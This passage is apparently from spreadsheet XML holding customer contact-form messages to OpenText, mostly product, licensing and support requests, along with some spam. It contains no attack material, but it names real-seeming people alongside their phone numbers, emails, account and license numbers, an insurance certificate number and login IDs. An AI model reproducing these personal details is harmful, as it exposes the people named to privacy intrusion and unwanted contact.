i was hoping if you would be interested in leather products on a very reasonable price , _x000D_
therefore i am sending you some pictures of the goods we have , also we can produce you design of your choice ._x000D_
if you like any of the article in the picture i will send you the samples and we can take it from there ,_x000D_
hope this would be of your interest , thank you for your time and effort ._x000D_
_x000D_
Kind Regards_x000D_
Ghazali Usmani_x000D_
whatsapp no : 00447454188234_x000D_
Mobile : 00923172104880_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Have upgraded document management system to ApplicationXtender 16.3 and need to replace Image Scanner Canon DR-9050C--that is not Cloud Capture certified with a comparable Cloud Certified machine.  Other offices using scanners with CCT 1.0 certification.   The goal is to purchase a scanner that will interface more smoothly with AX16, can handle the load and operate more efficiently than the Canon DR-9050C._x000D_
IS CCT 2.1 the highest certification level?</t>
  </si>
  <si>
    <t>Hi, I bought a Magellan Explorist GC 3 - 4 yrs ago.  Never used it because I don't know how to load the coordinants into it.  Do you think you can help me?  TY.</t>
  </si>
  <si>
    <t>I'm trying pay Renewal Notice ~ Ref # RC327661  $264.32 1 Yr renewal but our system blocks your information.  Can I pay telephonically or by fax?  My hours at 7am to 2pm M-F</t>
  </si>
  <si>
    <t>I would like access to download the latest versions of Encase.  We purchased a 3 year license in November 2017, under transaction number SC2005846+R10-AUG-17 15:04:04.  However when I log into Opentext support, it keeps bouncing me in a loop asking to verify my email address.  Can I get the access to download this?</t>
  </si>
  <si>
    <t>Over the next several months, the SWN legal department is evaluating eDiscovery processes and pursing new tools to implement as part of an improved, efficient workflow. Would love to learn more about solutions from OpenText.</t>
  </si>
  <si>
    <t>The company wants to set up an account with OPENTEXT. Can you give us some instruction how to do that? Also do you provide UPC barcodes? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,         _x000D_
                               _x000D_
My name is Tammy.  I am employed by Insperity.  We are a Pre-Employment Screening Company located in Texas.  Please let me know what information is needed or who I need to contact in order to verify if an applicant has an (EnCE) EnCase Certified Examiner, Guidance Software Certificate.  Please contact me with any information you may have.  your assistance is great appreciated. _x000D_
_x000D_
Thank you, _x000D_
 _x000D_
_x000D_
Thank you,_x000D_
_x000D_
_x000D_
_x000D_
Tammy Baker_x000D_
Processing Coordinator, Verifications_x000D_
Insperity Employment Screening_x000D_
1300 Rollingbrook Drive|Suite 300|Baytown, TX  77521_x000D_
OFFICE: 800-447-7421|FAX: 866-308-9853_x000D_
EMAIL: ies.verifications@insperity.com_x000D_
</t>
  </si>
  <si>
    <t>Temporary license for our DR testing. Please let me know the process to get the codes when required. Thanks</t>
  </si>
  <si>
    <t>Researching CCM platforms - looking to replace legacy document creation system</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I work on DXC supporting the Ryder account. Regarding the GXS Expedite/CICS product, please what is the last version available? Is it compatible with IBM CICS Transaction Server for zos 5.4?_x000D_
_x000D_
Thanks and Regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
Would you be interested in reaching out to Lawyers email list or industry specific list across USA? Reach them with the help of our accurate and Up-to-date database. We can customize it according to your needs. _x000D_
_x000D_
We have opt-in list of :-_x000D_
	Lawyers_x000D_
	Legal Staff Professionals_x000D_
	Law Students_x000D_
 _x000D_
Information Available: First Name, Last Name, Title, Email Address, Company, Address, City, State/Province, ZIP, Country, Phone, Fax, Employees, Sales, SIC Code, Primary Industry, NAICS and Web Address._x000D_
_x000D_
Note: Let me know your target market (Industry/Job Titles) and I shall get back to you with counts and the list details accordingly._x000D_
_x000D_
I would appreciate if you could forward this email to the concern person in your organization. Thank you for your time_x000D_
_x000D_
I look forward to your reply._x000D_
</t>
  </si>
  <si>
    <t>I represent HBO Latin America. We understand that HBO NY has a DAM solution with OpenText, formerly known as Artesia. We would like to evaluate extending this platform to HBO LA, under the current license agreement with HBO NY. Please contact me for further details to arrange details for a Demo, and a budgetary proposal for a DAM deployment.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
Would you be interested in reaching out to Lawyers email list or industry specific list across USA? Reach them with the help of our accurate and Up-to-date database. We can customize it according to your needs. _x000D_
_x000D_
We have opt-in list of :-_x000D_
	Lawyers_x000D_
	Legal Staff Professionals_x000D_
	Law Students_x000D_
 _x000D_
Information Available: First Name, Last Name, Title, Email Address, Company, Address, City, State/Province, ZIP, Country, Phone, Fax, Employees, Sales, SIC Code, Primary Industry, NAICS and Web Address._x000D_
_x000D_
Note: Let me know your target market (Industry/Job Titles) and I shall get back to you with counts and the list details accordingly._x000D_
_x000D_
I would appreciate if you could forward this email to the concern person in your organization. Thank you for your time_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I don't know if our Company has a customer account. _x000D_
I was looking for Technical Manuals  InfoArchive and InfoFusion.</t>
  </si>
  <si>
    <t>RE: OTCS Ticket 4001090 : TSPROGC Faxes are received but don't show in the manager nor prints</t>
  </si>
  <si>
    <t>I was trying to register for testdrive and want to explore for one day. I am receiving the emails, however the link is asking to register again. It says "Access key required in order to access the content on this website". I am going to the page by the url with key form the emai i received_x000D_
Thanks_x000D_
Prakash</t>
  </si>
  <si>
    <t>Explore RightFax solutions and pricing</t>
  </si>
  <si>
    <t>Interest in products / general questions</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
nous souhaitons déployer une solution de dématérialisation des factures au sein de EDF Renouvelables._x000D_
Nous aimerions avoir une démo de votre part et savoir si vous êtes intéressé pour répondre à un appel d'offre que nous allons lancer très prochainement._x000D_
Merci par avance de votre retour._x000D_
Cdt, _x000D_
Linda</t>
  </si>
  <si>
    <t>I need to register a new EnCase dongle and the support site for EnCase has been down for more than 24 hours.</t>
  </si>
  <si>
    <t>Road Accident Involving a Vehicle Insured By Ergo Hestia  Registration WGM37159 Ergo Hestia Certificate number 430001038982 - Driver Krzystof Jacek Metka</t>
  </si>
  <si>
    <t>Need to replace our outdated Fax system</t>
  </si>
  <si>
    <t>Hi,_x000D_
I updated my email address in your system from todd.mcnichols@theimtgroup.com to todd.mcnichols@imtins.com. Now when I try to access your support pages the page displays "Access Denied". Can you please fix this so I have access again._x000D_
_x000D_
Thanks,_x000D_
Todd</t>
  </si>
  <si>
    <t>Souhaite un devis pour un logiciel de CRM_x000D_
Merci,</t>
  </si>
  <si>
    <t>How do I get ADmin rights in order to research, add and or modify Fax2Mail Accounts. We will be adding more accounts and right now Mark Whitley is the only one that can. Thank you</t>
  </si>
  <si>
    <t>Teleform license service won't start</t>
  </si>
  <si>
    <t>Hi, We are a current client of Guidance. Our sales rep informed us that OpenText has acquired Guidance. Where would I request a copy of the official documents that show Guidance is now part of OpenText? I've tried asking my sales rep but it's taking a bit of time to get a response. I'm working on an amendment to our contract and I need to document this correctly. A W9 won't work (I have that) and I have the press release. Or an official letter will do that is addressed to our school. _x000D_
_x000D_
Thanks,_x000D_
Phan Truong</t>
  </si>
  <si>
    <t>Please provide a contact person to submit a formal request for proposal for your Documentum EDMS system.  We are currently working on developing a plan to transition from our current EDMS system to an improved system._x000D_
_x000D_
Thank you for all your assistance._x000D_
_x000D_
Best Regards_x000D_
Jeff Boyar</t>
  </si>
  <si>
    <t>We are conducting an International conference on Plastic Engineering and Polymer Science Scheduled during June 25-26, 2019 in Tokyo, Japan. KINDLY PROMOTE MY CONFERENCE.</t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
We have published a report on Business Rules Market Size and Analysis - Forecasts to 2025._x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
_x000D_
Best Regards!	</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону +7 (495) 248-01-88   Евгения</t>
  </si>
  <si>
    <t>What is the cost to participate in the Vienna conference? Not stated or found...</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
für die Software "OpenText Gupta Report Builder 6.3" benötigt unser Unternehmen eine Lizenz für einen Benutzer. Können Sie mich diesbezüglich kontaktieren bzw. kann man die Lizenzierung auch online abschließen?_x000D_
_x000D_
Mit freundlichem Gruß_x000D_
Uli Frischmannn</t>
  </si>
  <si>
    <t>Need partner in Egypt</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to understand the high level functions of your enterprise content management system. A list of functionalities. _x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>We are implementing SharePoint 2019 onprem solution and looking for redact documents. That is to black out sensitive information in a document and password protect it so that it cannot be seen. pls share technical and financial details.</t>
  </si>
  <si>
    <t>jobs iti and cad/cam</t>
  </si>
  <si>
    <t>Meet the speakers @Big Data 2019</t>
  </si>
  <si>
    <t>Looking for eDoc Document Management System , Expecting a contact /call back from the local Dubai OpenTxt officeDealer to know more about .. Thank you</t>
  </si>
  <si>
    <t>Hello Sir/Madam_x000D_
I need your help to setting up a forensic workstation and I have several question about that._x000D_
1- How to prevent a Windows based workstation from malware infection (specially "Ransomware") without using Antivirus? _x000D_
2- Given that most of forensic software like Encase, Works on Windows based systems so what’s your recommend configuration on windows operating systems for Forensic tools._x000D_
3- How to prevent external storages to be infected with malwares?_x000D_
4- If I must use antivirus on forensic workstation how to configure that to prevent from changing (e.g. deleting files) exported data._x000D_
I appreciate your answers in advance_x000D_
I’m looking forward to hearing from you.</t>
  </si>
  <si>
    <t>I was recently introduced to your produce EnCase E-Discovery, and to gain a better understanding of the product just completed participating in your training course for said product. I need to learn what the costs for licensing the software is, and ensure I understand fully what the hardware requirements are.  I thoroughly enjoyed the class taught by Mr. Daniel Smyth this past week and interested in moving forward with deploying this capability for my clients.</t>
  </si>
  <si>
    <t>We are a Managed Service Provider, and I have a law firm that needs to upgrade their Rightfax server.  I would like to find out what options there are.  They have a significant virtual infrastructure running on Hyper-V, and we are hoping that there are options to utilize that virtual environment.</t>
  </si>
  <si>
    <t>Information on your Invoice automation with OCR for SAP ECC</t>
  </si>
  <si>
    <t>looking to get encase certified. leaning towards on-demand course. how do i get started</t>
  </si>
  <si>
    <t>Trustmark is doing a vendor risk assessment survey.  I'm completing the survey but need two SAP contacts.  I could not reach my prior SAP sales contacts.  Could we get two contacts?  Title, Name, email, phone._x000D_
_x000D_
thanks_x000D_
Curt</t>
  </si>
  <si>
    <t>We are an all-Macintosh shop and we need access to some PDF files protected with IRM. Can you please send me the pkg file (or a link to the file) for the Mac client of your software...even if it is out of date? There is a broken link on your site to it. Unfortunately this form does not allow me to include a url. But the file name is EMC_IRM_PDF_Installer.pkg_x000D_
_x000D_
Thanks,_x000D_
-John</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the beginning phase of evaluating replacement candidates for our IBM MQ workflow system. To assist in our efforts can you please provide documentation or links addressing the following high-level criteria:_x000D_
1) Support for Case Management_x000D_
2) Support for Low Code/No Code_x000D_
3) Integration with internally developed systems and databases_x000D_
4) Integration with other content management systems (P8 content manager)_x000D_
5) Cloud support_x000D_
6) Architecture/infrastructure requirements if internal deployment is supported_x000D_
7) Do you have a framework or package available to assist in a BPM/Case management solution for insurance policy issuance and policy maintenance?_x000D_
</t>
  </si>
  <si>
    <t>My company Toys R Us is looking to implement a new contract/lease management system. _x000D_
Do you have a contract management system?_x000D_
Thanks</t>
  </si>
  <si>
    <t>_x000D_
Hello,  we are interested in acquiring EnCase we would like to have a demonstration, besides it is of our interest a local supplier in Chile</t>
  </si>
  <si>
    <t>I would like to make contact with you for a possible presentation/demo of your products c/o our office. Please contact me back. Thank you.</t>
  </si>
  <si>
    <t>Software Insite, Inc. is a Microsoft Gold Partner that delivers SharePoint, Office 365, and .NET solutions.  We have clients in Manufacturing, Health Care, and Higher Education who might benefit from your solution.  I'd like to understand more about your partner/reseller program and get some additional product information, specifically focused on your SharePoint Online document capture capabilities._x000D_
_x000D_
Thanks,_x000D_
Dave Poggi_x000D_
616-485-2700</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
Would you be able to share the licensing cost to work on a Gupta application (I guess to use OpenText Gupta Team Developper)?_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Looking for pricing for Encase Mobile Investigator.  What exactly do I need, how much, how long will it take for delivery?</t>
  </si>
  <si>
    <t>As companies look to find creative ways to grow their business without much risk and a high level of business capture success. It would certainly benefit by finding a well connected partner. I have spent 25 years roaming the halls in the Federal Government finding new applications and identifying the people making the key decisions for major contracts._x000D_
_x000D_
By partnering with me, your rate of success will jump drastically but most importantly, financial risk is minimal. Now is the time, to let me help you generate that much deserving new business.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in reselling opentext capture solutions </t>
  </si>
  <si>
    <t>Please add me to the Volvo cars account for support. _x000D_
EU0181202_x000D_
_x000D_
I'm the manager for that account and if possible it would be good if I can grant access to people. _x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>I need to verify employment for Szymon Reichmann and I need to send the verification to Human Resources</t>
  </si>
  <si>
    <t xml:space="preserve">discuss document mgmt options OpenText offers for legal needs.  was working with Joelle Drenjanin but she does not return my emails so assume she is no longer employed at OpenText.  </t>
  </si>
  <si>
    <t xml:space="preserve">Request for Quote:   OpenText Corp,Exceed PowerSuite;  Qty: 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking into setting up e-fax, was told by another office they use your company for this.</t>
  </si>
  <si>
    <t>Здравствуйте, нас зовут Яна Судьина и Ольга Мороз, мы профессиональные бухгалтеры. _x000D_
 _x000D_
Оказываем бухгалтерские услуги для (ИП, ООО, ТСЖ, СНТ, ЖСК) уже на протяжении 15 лет, за это время реализовано более 137 консалтинговых проекта и более 4500 отчетов, что говорит о нашем опыте работы. _x000D_
 _x000D_
Плюс к тому же мы несем полную финансовую ответственность за свою работу. _x000D_
Так же имеем благодарственные письма от компаний, которым на протяжении длительного сотрудничества мы успешно помогаем вести бухгалтерию. _x000D_
 _x000D_
Мы постоянно следим за законодательством, что позволяет оперативно информировать руководство компаний о важных изменениях. _x000D_
 _x000D_
С нами вы можете сэкономить на бухгалтерии до 48% - проверенный факт. _x000D_
Звоните по телефону: 8 (929) 556-73-72 _x000D_
 _x000D_
Также, помогаем оптимизировать налоги, оказываем серьезное внимание: _x000D_
- налоговой оптимизации _x000D_
- налоговой безопасности _x000D_
- и минимизируем налоговые риски. _x000D_
 _x000D_
Предлагаем Вам свои услуги по бухгалтерскому сопровождению, _x000D_
А так же поможем и в этих вопросах: _x000D_
- Абонентское юридическое обслуживание _x000D_
- Договорное право _x000D_
- Трудовое право _x000D_
- Кадровый аутсорсинг _x000D_
- Кадровое делопроизводство _x000D_
- Контроль отдела кадров _x000D_
- Администрирование договоров _x000D_
- Подготовка и сдача налоговой и бухгалтерской отчетности (на основании данных предоставляемых клиентом) _x000D_
- Ведение бухгалтерского учета компании в полном объеме _x000D_
- Полное юридическое сопровождение клиента _x000D_
 _x000D_
С нами налоговая и любые проверки вам не страшны! _x000D_
Закажите консультацию у нашего налогового юриста и узнаете свои шансы на победу. Мы поможем: _x000D_
- Вы ранее оптимизировали налоги, но не уверены, что сделали это правильно _x000D_
- Вы боитесь уголовной, субсидиарной ответственности за не уплаченные налоги _x000D_
- Вам грозит выездная налоговая проверка и благополучный ее исход призрачен _x000D_
- У вас уже идет выездная налоговая проверка и нужна квалифицированная помощь и юридическая защита _x000D_
 _x000D_
Наверное после прочтения этого письма у вас есть вопросы, мы готовы на них ответить. _x000D_
Дл</t>
  </si>
  <si>
    <t>I am having issues with accessing an encrypted forensic image. I would like to obtain an evaluation version of Encase 8 to see if this will resolve the issues we are having. If it does, we will likely purchase the license.</t>
  </si>
  <si>
    <t xml:space="preserve">Info regarding documentation material for website management server for open text version 16.  </t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(495) 230-10-78 Виктор</t>
  </si>
  <si>
    <t xml:space="preserve">We are working on Lotus Notes migration assessment project for one of our client and interested to Contact OpenText Lotus Notes migration tool as customer has highly customized application. _x000D_
_x000D_
I am looking for a trail licence for POC of 2 application and product information.  </t>
  </si>
  <si>
    <t>We build automatic machine learning and computer vision solutions for video and are interested in learning more about your company and  potentially becoming a partner.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour Monsieur._x000D_
_x000D_
Je travaille pour une entreprise qui fabrique des pièces plastiques principalement pour le secteur automobile._x000D_
_x000D_
Actuellement nous faisons de l'EDI, via deux fournisseurs EDI, avec certains clients qui travaillent déjà avec vous sauf erreur de ma part._x000D_
Nexteer et Delphi notamment._x000D_
_x000D_
Dans le cadre d'un changement éventuel j'aimerais savoir ce que vous pourriez nous proposer comme service EDI ?_x000D_
WebEDI, ClassicEDI, génération de fichier PDF, export et import de fichier texte, etc ..._x000D_
_x000D_
Notre besoin actuel est la réception des "Delivery Forecast" et "Ship Schedule" (fichiers Delfor et Deljit) et l'envoi aux client des "Despatch Advice" (fichier Desadv)._x000D_
_x000D_
Dans l'attente de votre réponse._x000D_
Cordialement._x000D_
_x000D_
Alain Bosco_x000D_
alain_bosco@microtechnic.mc_x000D_
+377 97 98 40 75_x000D_
_x000D_
Microtechnic Monaco_x000D_
2 rue du Gabian_x000D_
98000 Monaco_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hello,_x000D_
_x000D_
Hope you’re doing well! _x000D_
_x000D_
My name is Alisha, would you be interested connecting with following Language Translation Industry Decision Makers who purchase your company products and services?_x000D_
_x000D_
I’d be happy to send over few sample records for Data quality check. We maintain Validated and opt-in Database of all industry across USA, Canada and Australia.  _x000D_
_x000D_
Language Translation Industry Decision Makers:_x000D_
_x000D_
•	Translation Manager_x000D_
•	Translator / IT Manager_x000D_
•	Technical Translators/Consultants_x000D_
•	Project Engineers/Managers_x000D_
•	Director of Client Solutions_x000D_
•	Teachers/Lectures/Professors_x000D_
•	Principals/Associates/Directors/Vice Principals_x000D_
•	Chief Information Officers_x000D_
•	Director of Technology Solutions_x000D_
•	Cloud Solutions Architect _x000D_
•	Solutions Architect_x000D_
•	QA Engineer/Manager_x000D_
•	Business Development Managers_x000D_
•	Talent Program Managers/Engineers_x000D_
•	Operation And Sourcing Managers and more_x000D_
_x000D_
Every Contact Includes: Contact Name, Titles, Company Name, Address, City, State, Contact Number, Website, Employee Size, Revenue Size, Industry Vertical, NAICS, and Permission Based Email Address etc. in Excel Format for your ownership with unlimited usage. _x000D_
_x000D_
Please fill in your Target Criteria in below:  _x000D_
_x000D_
Industry _______ Title  _______  Geography _______ _x000D_
_x000D_
I’d be grateful if you would forward this email to the appropriate contact and help me with the introduction. _x000D_
_x000D_
Warm Regards,_x000D_
Alisha Rogers_x000D_
Business Development Coordinator_x000D_
B2B | E-mail and Data Appending Services| USA |Canada_x000D_
E-mail:  alisha.rogers@greenprospect-us.com_x000D_
_________________________________________x000D_
If you're not interested please reply subject line as "Leave Out”._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for some information regarding integrations with various DMS that you offer mainly documentum and edocs. Our Patent product is adapted widely by top enterprises that use your DMS systems or plan on using based on our integration abilities. So looking to see if I can get some info on your current and new offerings.</t>
  </si>
  <si>
    <t>Search for product, RFP opportunity, cloud solution option considered - looking for sales representation in Polish market</t>
  </si>
  <si>
    <t>Looking for a multimedia management product that is available on premise, this will be used across multiple channels and teams.</t>
  </si>
  <si>
    <t>I wish to attend your event on November 15th at 3:30 entitled "Privacy by Design in a Modern World".  Please send an invitation and directions, including a contact person and phone number in case I'm late.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Erste Kontaktaufnahme vom 06.11.2018 bisher ohne Feedback. Anbei nochmals meine Anfrage :_x000D_
_x000D_
Sehr geehrte Damen und Herren, aktuell bin ich für einen internationalen Konzern bei einem SAP-Einführungs Projekt tätig. Dabei geht es um einen japanischen Konzern mit weltweiten Niederlassungen. Die SAP Einführung betrifft Europa mit dem Headquater in Deutschland. Nun kommen wir dabei auf das Thema Dokumentenmanagement zu sprechen. _x000D_
Da ich bereits sehr lange im SAP GEschäft bin, kannte ich vorher IXOS und hatte im meinem ltz. Projekt (in UK) ebenfalls Kontakt mit OPEN TEXT. Daher wende ich mich an Sie._x000D_
In diesem Projekt steht lediglich die Archivierung von Dokumenten unter folgenden Rahmenbedingungen zur Diskussion._x000D_
- System steht in Japan_x000D_
  daher ist ein Support in Japan erforderlich_x000D_
- es geht um ca. 600 User weltweit_x000D_
  hier ist die Frage nach den Lizenzkosten_x000D_
- SAP- und Dt. Finanz-Zertifizierung _x000D_
- Einbindung von G-Mail_x000D_
- hauptsächlich SAP-Ausgangsbelege zu archivieren_x000D_
- ggf. Dokumente wie Verträge / Vereinbarungen (PDF)_x000D_
  und Office-Dokumente _x000D_
- keine Scenarien wie "frühes erfassen" oder andere Workflow_x000D_
  Einsätze_x000D_
_x000D_
Könnten Sie mir dazu Auskünfte und Unterlagen/Information in englisch zur Verfügung stellen ?_x000D_
(13.11.2018 :_x000D_
Wenn möglich per Mail, weil der nä. Kundentermin in KW47 ist.)_x000D_
_x000D_
Besten Dank im Voraus für Ihre Bemühungen._x000D_
Mit freundlichen Grüßen_x000D_
Hans Engelke_x000D_
</t>
  </si>
  <si>
    <t>Good morning, i'd like to check if i can download Documentum on my computer for free. I'm a student and need to analyse one resources solution. Thank you by advance</t>
  </si>
  <si>
    <t>Would like to try to process Checks and get information from it. Please let me know how can I download it and test it usefulf for us or not.</t>
  </si>
  <si>
    <t>Have a 10.5 rendition server with Adlib. From my managers it seems OpenText recommends to switch to Blazon. I did not find the software needed on the SAP marketplace and no info if Blazon can be used with 10.5. _x000D_
_x000D_
Please support me to find the software. And am I right to assume it can be installed first and then only needs a license-key once we want to operate it ?</t>
  </si>
  <si>
    <t xml:space="preserve">I need access to our support contract for Volvo cars. </t>
  </si>
  <si>
    <t>Hej,_x000D_
Vi på Green Cargo kommer inom kort att skicka ut  en uppförandekod till alla våra leverantörer och vill vara säkra på att den hamnar hos rätt person._x000D_
Vem och till vilken mailadress kan vi skicka den?_x000D_
Med vänlig hälsning _x000D_
Lena Sundqvist</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, My name is Linda Hou, Service and delivery Manager for Integration within Skandinaviska Enskilda Banken AB._x000D_
 _x000D_
We are looking for new solution to replace our current Common File Transfer platform. As first step we would like to send you our RFI ( Request For Information) to obtain more information regarding your CFT solution. Would you please provide me the contact information – email that I can send the document to._x000D_
 _x000D_
Thanks and Regards_x000D_
/Linda_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">VIM software homologation by Spanish Tax Administration ( AEAT) _x000D_
We are an Spanish entity in process of implement VIM ( SAP) in an international Project affecting all the Group. As VIM is using the scanning in oredr to digitalize the invoices, we wonder if the company OPentext has obtained any certification or is doing any action to obtain it with the  Spanish tax admnsitration in order to  Homologate teh VIM software for tax purposes. We will appreciate your response by mail. Thanks </t>
  </si>
  <si>
    <t>VC</t>
  </si>
  <si>
    <t>Hello dear madam,_x000D_
Kindly let me know if I have any suitable positions in your firm_x000D_
_x000D_
With best regards,_x000D_
Pavani A</t>
  </si>
  <si>
    <t>Wir sind Lizenznehmer von Open Text 11 und stehen vor der Entscheidung, auf Open Text 16 upzugraden oder ein anderes CMS einzusetzen. Ich bitte daher um Informationen, was die Unterschiede zwischen den beiden Version sind und vor allem um Informationen, die uns dabei helfen, den  Aufwand für ein Upgrade von 11 auf 16 einzuschätzen. Vielen Dank</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Pourriez-vous me fournir un devis pour l’achat de 2 licences Hummingbird Exceed dans une version compatible Windows 10 ?_x000D_
Merci par avance pour votre aide et retour_x000D_
_x000D_
Stessa</t>
  </si>
  <si>
    <t>Dear Madam, dear Sir,_x000D_
We are a software engineering company and we developed a specific software for one of our clients (local government agency). They are now asking us to add a function to our application so that the document it générâtes can be pushed into Open Text Content Server directly (using the REST API)._x000D_
Our client cannot/will not provide access to their environement for safety reasons so we are now facing a problem regarding development._x000D_
I would like to know if there is a trial or development version of Open Text Content Server which we can use for our development and test work (estimated time 6-8 weeks)._x000D_
We need to deliver the updated solution by the end of the year._x000D_
Please feel free to ask for more détails if needed._x000D_
Best regards_x000D_
Thierry Guéguen_x000D_
CTO</t>
  </si>
  <si>
    <t>We at Cognizant would like to explore the newly launched product OT2. We would be interested in configuring it on our local infrastructure or access the same if OpenText is willing to share the access details for a pre-configured trial setup._x000D_
_x000D_
Thank you for your help and support.</t>
  </si>
  <si>
    <t>we looking to a Fax2Mail solution and maybe also to replace the existing mail2fax solution. we have not receive many faxes but due to digitalisation we would like to remove some old legacy systems.</t>
  </si>
  <si>
    <t>need  to explore solution for enterprise content management (  sharing and  version control)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there. I had shares in Vignette Corporation, when Open Text acquired them in 2009. How would I go about confirming the shares are still valid or otherwise. thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Course on xpression suite </t>
  </si>
  <si>
    <t>We have purchased EnCase and need assistance. We are unable to find the contact information for the sales rep assigned to our account. Could you please have our sale rep reach out to me at the information provided. My company is Anixter Inc.</t>
  </si>
  <si>
    <t>Interested in RightFax Cloud</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are installing OpenText on MS-SQL server and have a question on that._x000D_
Can we install OpenText on MS-SQL trial version and then, later on, apply the license once we have it_x000D_
Thanks_x000D_
Aftab</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to see options to Migrating to Cloud Based faxing. We currently are on 10.6 right-fax and would like to see what the process would be to move away from that and go cloud based. </t>
  </si>
  <si>
    <t>TESTE</t>
  </si>
  <si>
    <t xml:space="preserve">I work with a small single-site medical office and comparing e-faxing solutions came across your site/product.  Looking to get some additional info on product, pricing, and implementation.  </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to cancel the service.  My account # WVLA687271, invoice # 03963761811.  we used to be with EasyLink now is Opentext.   </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
 _x000D_
_x000D_
I am having issues logging into my account. I have reset my password twice just now and nothing is working. I have the correct network ID and User ID. See below._x000D_
_x000D_
 _x000D_
_x000D_
Network ID: LU929_x000D_
_x000D_
UserID: LU929A_x000D_
_x000D_
 _x000D_
_x000D_
Please help reset/log in to my account. We have several items we need to add to our catalog._x000D_
_x000D_
 _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Dear support,_x000D_
_x000D_
We are looking for a trial copy of OpenText Content Suite/Server._x000D_
Could you please provide me with a link to download the trial?_x000D_
_x000D_
Best regards,_x000D_
Maxim</t>
  </si>
  <si>
    <t>I would in interested in the Quiterian Analytics platform</t>
  </si>
  <si>
    <t>i buy the licens for gupta 6.3  i tray to activate but not accept</t>
  </si>
  <si>
    <t xml:space="preserve">Would like more information on Open Text digital content Products.  Hoping to talk to a consultant to recommend a product for our company.  </t>
  </si>
  <si>
    <t xml:space="preserve">These are the emails and I am Alexis Farnum_x000D_
In charge of the company that sold the renovations to the end user, we urgently need to send us the renewal files via mail._x000D_
In this email you will find the information that was sent to the Open Tech support page which answered that the account yair.vallejos@imelcf.gob.pa had been restored, however at the moment of entering with that account the platform of Open Tech it issues a Web server error message. For the above mentioned request I ask for the pertinent steps in order that we can general access to the download of the updates either by means of the reestablishment of a generic or that they send us the update files by other means. Attached screen printing of the above described. greeting_x000D_
G2002085851_x000D_
G2002085852_x000D_
G2002085850_x000D_
G2002023830_x000D_
G2002079911_x000D_
G2002079915_x000D_
yair.vallejos@imelcf.gob.pa_x000D_
imelsif@gmail.com_x000D_
rsantana9006@gmail.com_x000D_
</t>
  </si>
  <si>
    <t>Our company is currently using Open txt NFS Solo 14.  We are in the process of upgrading all devices to Windows 10.  Need to know if this version is certified to run on Windows 10.  If not what are our options?</t>
  </si>
  <si>
    <t>Please provide access to enable to log issues and also access to the knowledge base._x000D_
Thanks_x000D_
Dinesh Shah</t>
  </si>
  <si>
    <t>Requiero con caracter de urgencia solicitar unas licencias de encases que fueron compradas este año por nostros</t>
  </si>
  <si>
    <t>Hello a short question about OS Support._x000D_
Is Opentext Exceed version 14 support for Windows 10 ?_x000D_
What is the minimal version for Windows 10 ?_x000D_
What is the minimal version for Windows 8.1</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je réponds à l'AO de la SNCF et j'ai besoin d'informations. pourriez vous me contacter svp?_x000D_
merci d'avance</t>
  </si>
  <si>
    <t xml:space="preserve">Need access for support portal and Knowledge base portal for open text </t>
  </si>
  <si>
    <t>Interested in an in house FoIP solution that will send faxes to email. No interest in cloud services.</t>
  </si>
  <si>
    <t>Learn deeper the power of this solution</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
HireRight is a background screening company appointed by one of the Clients to verify information for the purposes of a pre-employment screening report and have been asked to confirm PROFESSIONAL QUALIFICATIONS of one of your former students._x000D_
_x000D_
I would be grateful if you could provide contact details to your Registry or to the person who would be able to confirm qualifications obtained and I will send a request for verification with the Candidate's details._x000D_
_x000D_
Thank you in advance for your kind assistance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Fraud </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Fax to email platform solutions </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
_x000D_
at the moment we are looking for a Fax Solution with email functionality with PDF (great plus would be OCR). Unfortunately we didn’t find price on your web page._x000D_
_x000D_
Could you please send us a price list for RigthFax solution._x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Mit freundlichen Grüßen - Kind regards, _x000D_
_x000D_
Alexey Zhebet_x000D_
Infrastructure Specialist_x000D_
IT Operations_x000D_
Senior Associate_x000D_
_x000D_
VTB Bank (Europe) SE _x000D_
Rüsterstraße 7-9, 60325 Frankfurt _x000D_
_x000D_
